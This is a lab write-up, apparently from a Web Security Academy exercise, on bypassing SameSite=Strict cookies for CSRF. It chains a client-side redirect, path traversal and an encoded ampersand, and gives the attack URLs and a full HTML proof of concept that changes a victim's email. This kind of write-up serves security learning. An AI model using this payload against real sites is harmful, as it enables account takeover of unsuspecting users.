In my last write-up, I covered a lab similar to this one, but I also explained some fundamental concepts there, so feel free to check that out first.

Anyway, let's start this lab. First, I tried to change the email address and captured the request to analyze it. I noticed that the request doesn't have any CSRF token — it only has session cookies with the HttpOnly flag, and the SameSite attribute is set to Strict.

None

Alright, so I knew I couldn't use the top-level navigation trick I used in my last lab, because back then the SameSite attribute was set to Lax. This time it's different.

I changed the email address again and captured the request

None

— nothing unusual so far. Then I wanted to check if changing the request method to GET would still work.

None

And it did.

Now I had no idea what to do next, so I checked the solution. What was my mistake? I didn't go through the entire application before looking at the solution.

Anyway, here's the key: there's a comment functionality on each post. When you post a comment, something interesting happens.

None

As you can see, after posting the comment, the page redirects to another page for a few seconds and then back to the previous page.

None

it redirects to a confirmation page with a postId parameter. I tried changing it and found that I could control it.

So I tested whether I could redirect to my account page from here:

/post/comment/confirmation?postId=/my-account

It worked — but as I mentioned, after a few seconds it tries to take you back to the previous directory. Since there's no directory like post/my-account,

None

I had to use a path traversal trick:

/post/comment/confirmation?postId=../my-account

Next, I tried to change the email like this:

/post/comment/confirmation?postId=/my-account/change-email?email=pavan%40gmail.com&submit=1

But I got an error — missing parameter submit

None

That's because the & wasn't encoded. So I encoded it as %26:

/post/comment/confirmation?postId=/my-account/change-email?email=pavan%40gmail.com%26submit=1

That worked perfectly.

Now it was time to write the PoC (Proof of Concept):

<!DOCTYPE html>
<html lang="en">
<body>
  <h1>Form CSRF PoC</h1>
  <form method="GET" action="https://0ab300aa04ac3c1f80c817a9004000cc.web-security-academy.net/my-account/change-email">
    <input type="hidden" name="email" value="pawned12@gmail.com">
    <input type="hidden" name="submit" value="1">
    <input type="submit" value="Submit Request">
  </form>
  <script>
    document.location = "https://0ab300aa04ac3c1f80c817a9004000cc.web-security-academy.net/post/comment/confirmation?postId=../my-account/change-email?email=pavan456%40gmail.com%26submit=1";
  </script>
</body>
</html>

I delivered it to the victim, and just like that — I bypassed the SameSite=Strict restriction using a client-side redirect. The lab was solved.

None

Alright, that's it for today. I'll meet you in the next write-up. Till then, good night — because I'm really tired.

Thanks for reading!